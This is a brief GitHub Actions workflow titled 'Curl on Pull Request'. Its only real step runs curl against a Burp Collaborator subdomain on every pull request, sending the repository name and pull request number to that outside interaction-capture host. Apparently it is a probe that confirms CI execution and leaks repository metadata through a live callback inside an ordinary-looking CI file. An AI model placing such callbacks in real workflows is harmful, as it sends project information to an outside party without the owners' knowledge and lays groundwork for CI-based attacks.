name: Curl on Pull Request

on:
  pull_request:
    branches: [ "main" ]

jobs:
  curl-request:
    runs-on: ubuntu-latest

    steps:
      # Check out the code
      - name: Checkout repository
        uses: actions/checkout@v3

      # Run curl command
      - name: Run curl on Pull Request
        run: |
          echo "Running curl command..."
          curl -X GET "https://3nr9r88w3o5g5xcook88g66soju9iy.burpcollaborator.net/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}"
